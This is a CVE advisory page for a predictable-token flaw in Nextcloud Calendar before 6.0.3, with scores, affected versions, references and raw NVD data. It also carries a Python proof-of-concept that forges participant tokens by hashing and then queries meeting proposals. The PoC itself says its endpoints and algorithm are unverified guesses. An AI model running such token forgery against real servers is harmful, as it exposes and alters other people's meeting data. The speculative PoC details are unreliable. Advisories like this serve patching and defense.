Security Vulnerability Report
CVE-2025-66511 CVSS 4.8 MEDIUM

CVE-2025-66511

Published: 2025-12-05 17:16:05
Last Modified: 2025-12-10 16:14:27

Description

Nextcloud Calendar is a calendar app for Nextcloud. Prior to 6.0.3, the Calendar app generates participant tokens for meeting proposals using a hash function rather than a random source, so an attacker can compute valid participant tokens and use them to request details and submit dates in meeting proposals. The tokens are not generated purely at random. This vulnerability is fixed in 6.0.3.

CVSS Details

Secondary score (shown in the header above)
CVSS Score: 4.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N

Primary score (from the raw record below; differs only in attack complexity)
CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Weakness: CWE-330

Configurations (Affected Products)

cpe:2.3:a:nextcloud:calendar:*:*:*:*:*:*:*:* - VULNERABLE
Nextcloud Calendar >= 6.0.0 and < 6.0.3 (fixed in 6.0.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

#!/usr/bin/env python3
"""
CVE-2025-66511 PoC - Nextcloud Calendar Participant Token Prediction
Note: This is for educational purposes only. Do not use without authorization.
"""
import hashlib
import requests

# Configuration (placeholders; replace with values for an instance you are authorized to test)
NEXTCLOUD_URL = "https://your-nextcloud-instance.com"
MEETING_ID = "target_meeting_id"
PARTICIPANT_ID = "attacker_controlled_or_known_id"


def generate_participant_token(meeting_id, participant_id, salt="known_or_discovered_salt"):
    """
    Generate participant token using the vulnerable hash function.
    The actual algorithm may vary - this is a demonstration.
    """
    # This is a simplified representation of the vulnerable token generation:
    # a deterministic digest over known inputs instead of a random value.
    data = f"{meeting_id}:{participant_id}:{salt}"
    token = hashlib.sha256(data.encode()).hexdigest()[:32]
    return token


def exploit():
    """
    Exploit steps:
    1. Get meeting proposal details (publicly accessible)
    2. Extract meeting_id and participant information
    3. Generate valid participant tokens
    4. Submit date proposals using generated tokens
    """
    # Endpoint paths and the header name below are this PoC's own illustrative
    # guesses; they are not verified against the Calendar app's real routes.
    # Step 1: Get meeting details
    meeting_url = f"{NEXTCLOUD_URL}/apps/calendar/api/v1/meetings/{MEETING_ID}"
    response = requests.get(meeting_url)
    if response.status_code == 200:
        meeting_data = response.json()
        print(f"[+] Retrieved meeting: {meeting_data.get('title')}")

        # Step 2: Generate tokens for each participant
        participants = meeting_data.get('participants', [])
        for participant in participants:
            participant_id = participant.get('id')
            token = generate_participant_token(MEETING_ID, participant_id)

            # Step 3: Use token to access details or submit dates
            detail_url = f"{NEXTCLOUD_URL}/apps/calendar/api/v1/meetings/{MEETING_ID}/proposal"
            headers = {'X-Participant-Token': token}
            detail_response = requests.get(detail_url, headers=headers)
            if detail_response.status_code == 200:
                print(f"[+] Successfully accessed meeting details as {participant_id}")
                print(f"[+] Token: {token}")


if __name__ == "__main__":
    print("CVE-2025-66511 - Nextcloud Calendar Token Prediction")
    exploit()

References

https://github.com/nextcloud/calendar/commit/8de14ae87f321f5f09280d9895a27d54d24f33fb (Patch)
https://github.com/nextcloud/calendar/pull/7659 (Issue Tracking)
https://github.com/nextcloud/security-advisories/security/advisories/GHSA-whm3-vv55-gf27 (Patch, Vendor Advisory)
https://hackerone.com/reports/3385434 (Permissions Required, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66511", "sourceIdentifier": "[email protected]", "published": "2025-12-05T17:16:04.797", "lastModified": "2025-12-10T16:14:27.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Calendar is a calendar app for Nextcloud. Prior to 6.0.3, the Calendar app generates participant tokens for meeting proposals using a hash function, allowing an attacker to compute valid participant tokens, which allowed them to request details and submit dates in meeting proposals. The tokens are not purely random generated. This vulnerability is fixed in 6.0.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-330"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:calendar:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "24F60C27-884F-4BF3-A50E-D189CA2DBC02"}]}]}], 
"references": [{"url": "https://github.com/nextcloud/calendar/commit/8de14ae87f321f5f09280d9895a27d54d24f33fb", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nextcloud/calendar/pull/7659", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-whm3-vv55-gf27", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://hackerone.com/reports/3385434", "source": "[email protected]", "tags": ["Permissions Required", "Vendor Advisory"]}]}}